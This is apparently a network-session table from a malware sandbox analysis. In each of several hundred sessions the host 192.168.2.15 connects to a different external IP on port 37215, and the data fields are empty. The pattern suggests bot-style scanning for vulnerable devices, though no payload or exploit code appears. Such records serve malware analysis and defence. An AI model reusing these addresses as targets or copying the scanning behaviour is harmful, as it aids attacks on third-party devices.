                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5074192.168.2.156051418.94.171.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5075192.168.2.1546680157.232.22.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5076192.168.2.1550328186.210.59.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5077192.168.2.154805841.193.204.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5078192.168.2.1552282197.37.217.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5079192.168.2.1542156156.183.184.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5080192.168.2.155335831.119.220.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5081192.168.2.1554316121.78.90.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5082192.168.2.1555660181.64.155.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5083192.168.2.1545932138.130.151.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5084192.168.2.153679237.188.93.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5085192.168.2.1560202156.109.194.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5086192.168.2.1540158138.90.135.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5087192.168.2.1559712102.2.55.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5088192.168.2.154660631.34.222.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5089192.168.2.1542002197.19.227.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5090192.168.2.1550774102.205.169.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5091192.168.2.154670437.107.37.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5092192.168.2.153909431.73.225.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5093192.168.2.1547972138.94.12.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5094192.168.2.1535920156.145.116.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5095192.168.2.1543982181.61.119.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5096192.168.2.1545588222.63.186.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5097192.168.2.154687841.59.128.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5098192.168.2.1555824122.56.123.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5099192.168.2.1546576197.213.104.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5100192.168.2.1556994190.133.14.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5101192.168.2.1545696121.170.74.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5102192.168.2.1547330102.171.122.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5103192.168.2.154043037.195.197.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5104192.168.2.1547958157.217.227.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5105192.168.2.1553292181.63.126.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5106192.168.2.1554614222.22.50.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5107192.168.2.155183437.57.145.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5108192.168.2.1559164181.248.69.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5109192.168.2.154768241.168.210.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5110192.168.2.1549290190.42.151.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5111192.168.2.155953641.129.166.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5112192.168.2.153759437.45.205.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5113192.168.2.154922494.42.248.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5114192.168.2.1538686102.31.233.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5115192.168.2.1536306197.167.21.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5116192.168.2.1553406197.170.178.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5117192.168.2.154121641.29.80.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5118192.168.2.1552906138.156.253.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5119192.168.2.156077245.55.76.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5120192.168.2.153932837.255.152.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5121192.168.2.1551496222.157.13.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5122192.168.2.155180231.235.208.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5123192.168.2.1539176122.79.47.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5124192.168.2.1537052121.89.222.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5125192.168.2.1559294102.96.3.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5126192.168.2.156095631.222.238.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5127192.168.2.154971241.172.186.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5128192.168.2.1536330102.35.17.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5129192.168.2.1543728181.13.80.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5130192.168.2.1536806121.201.182.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5131192.168.2.154134431.58.40.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5132192.168.2.1546578102.20.57.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5133192.168.2.1551298157.218.250.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5134192.168.2.1538192197.126.90.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5135192.168.2.1546662222.38.102.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5136192.168.2.1553468122.145.200.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5137192.168.2.1550214181.38.148.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5138192.168.2.1536248181.61.171.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5139192.168.2.1560148156.236.30.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5140192.168.2.153872494.36.158.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5141192.168.2.154508237.186.235.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5142192.168.2.1552586197.227.73.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5143192.168.2.1545954181.46.144.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5144192.168.2.1550502157.177.181.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5145192.168.2.154941694.83.93.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5146192.168.2.1557386121.131.74.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5147192.168.2.155511494.224.106.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5148192.168.2.1557236121.12.138.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5149192.168.2.1559896102.230.198.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5150192.168.2.1559740195.187.94.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5151192.168.2.155035231.177.199.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5152192.168.2.1541594186.87.55.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5153192.168.2.1543078157.36.17.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5154192.168.2.1560234157.73.220.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5155192.168.2.155845437.95.68.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5156192.168.2.154371037.107.171.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5157192.168.2.1555394181.54.99.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5158192.168.2.1546810174.229.96.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5159192.168.2.1554136181.14.46.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5160192.168.2.1542400156.243.18.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5161192.168.2.155455694.144.154.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5162192.168.2.1541448102.21.233.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5163192.168.2.1536370157.225.164.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5164192.168.2.1540340157.96.239.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5165192.168.2.1534096186.19.92.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5166192.168.2.1540380121.171.70.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5167192.168.2.1548604190.221.99.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5168192.168.2.1542160156.35.221.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5169192.168.2.1547396157.31.124.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5170192.168.2.154964041.197.48.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5171192.168.2.155137831.70.135.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5172192.168.2.155337873.69.195.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5173192.168.2.154337837.148.19.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5174192.168.2.154973094.97.242.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5175192.168.2.1559372197.226.221.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5176192.168.2.1534758138.128.38.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5177192.168.2.154073894.16.48.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5178192.168.2.154127431.29.186.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5179192.168.2.1541870186.123.44.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5180192.168.2.153325431.232.145.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5181192.168.2.1559158172.235.43.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5182192.168.2.1553030156.6.0.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5183192.168.2.1535260157.7.48.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5184192.168.2.1558686190.12.246.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5185192.168.2.1533646186.44.14.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5186192.168.2.1545362190.179.21.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5187192.168.2.154565645.72.109.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5188192.168.2.1559260222.203.143.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5189192.168.2.1542940186.99.42.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5190192.168.2.1548564102.45.13.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5191192.168.2.1535642156.216.106.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192192.168.2.153597031.178.97.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5193192.168.2.154958894.223.191.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5194192.168.2.1551214181.78.103.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5195192.168.2.1547458121.146.119.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5196192.168.2.1550470102.10.31.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5197192.168.2.1551120181.43.154.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5198192.168.2.1550696157.3.50.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5199192.168.2.1555908190.107.90.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5200192.168.2.1558162102.166.92.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5201192.168.2.1550354157.116.44.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5202192.168.2.155165894.130.20.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5203192.168.2.1543020190.31.72.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5204192.168.2.1560992186.179.107.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5205192.168.2.153536031.1.192.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5206192.168.2.1550560157.49.250.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5207192.168.2.1537300138.3.54.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5208192.168.2.155226641.16.209.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5209192.168.2.1538730190.191.111.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5210192.168.2.1536084197.93.29.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5211192.168.2.1540226197.113.116.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5212192.168.2.1542012138.66.17.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5213192.168.2.1540654157.149.42.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5214192.168.2.155589041.117.32.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5215192.168.2.1560628222.195.237.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5216192.168.2.154118237.159.17.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5217192.168.2.1547030122.190.72.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5218192.168.2.1559494222.78.165.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5219192.168.2.1556866222.180.90.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5220192.168.2.153817437.149.154.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5221192.168.2.154856445.160.62.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5222192.168.2.1544064222.19.25.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5223192.168.2.1537752222.247.11.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5224192.168.2.1540066122.36.255.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5225192.168.2.155374294.235.137.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5226192.168.2.1558760222.149.136.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5227192.168.2.153514837.83.66.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5228192.168.2.1552472222.132.49.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5229192.168.2.153953437.244.130.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5230192.168.2.153541841.114.32.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5231192.168.2.154436445.216.136.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5232192.168.2.1560222102.92.214.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5233192.168.2.1538792181.91.120.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5234192.168.2.1551544157.205.93.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5235192.168.2.1546452102.200.155.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5236192.168.2.153385837.154.78.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5237192.168.2.1542414138.249.2.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5238192.168.2.155929237.100.96.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5239192.168.2.1552864186.62.188.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5240192.168.2.1542516121.77.161.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5241192.168.2.1539322121.194.192.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5242192.168.2.1542524190.196.146.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5243192.168.2.1550510122.58.44.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5244192.168.2.1557744197.71.113.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5245192.168.2.1551940186.174.23.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5246192.168.2.1558920186.247.221.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5247192.168.2.153549631.219.225.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5248192.168.2.1543080181.1.125.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5249192.168.2.155927640.35.160.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5250192.168.2.153609672.66.252.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5251192.168.2.1541048156.248.39.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5252192.168.2.1540488102.250.212.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5253192.168.2.1552034181.2.210.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5254192.168.2.1559566197.215.174.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5255192.168.2.1548134156.162.232.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5256192.168.2.1544608222.199.204.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5257192.168.2.1547894122.150.190.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5258192.168.2.1544100102.64.238.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5259192.168.2.155341237.238.17.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5260192.168.2.154058041.138.168.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5261192.168.2.154255647.99.241.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5262192.168.2.1533718186.186.233.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5263192.168.2.1540996222.239.39.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5264192.168.2.153795037.128.218.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5265192.168.2.1555492102.71.129.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5266192.168.2.1557298181.237.65.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5267192.168.2.1550486102.3.205.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5268192.168.2.1550782186.132.185.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5269192.168.2.1557126102.74.58.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5270192.168.2.154877245.144.58.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5271192.168.2.1550604172.125.199.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5272192.168.2.1549386121.139.230.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5273192.168.2.1534794121.187.206.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5274192.168.2.1554358138.141.10.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5275192.168.2.155017845.43.52.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5276192.168.2.1534154197.154.243.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5277192.168.2.1558616122.31.188.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5278192.168.2.1550364157.144.122.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5279192.168.2.154081883.130.172.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5280192.168.2.1533836156.113.26.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5281192.168.2.153565037.184.143.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5282192.168.2.153539241.171.154.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5283192.168.2.1544294157.26.182.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5284192.168.2.153934045.183.122.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5285192.168.2.1555052156.152.225.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5286192.168.2.1549750186.43.136.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5287192.168.2.1550680197.27.91.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5288192.168.2.1551590156.21.10.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5289192.168.2.154504031.176.28.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5290192.168.2.154114431.130.21.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5291192.168.2.1552372122.36.82.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
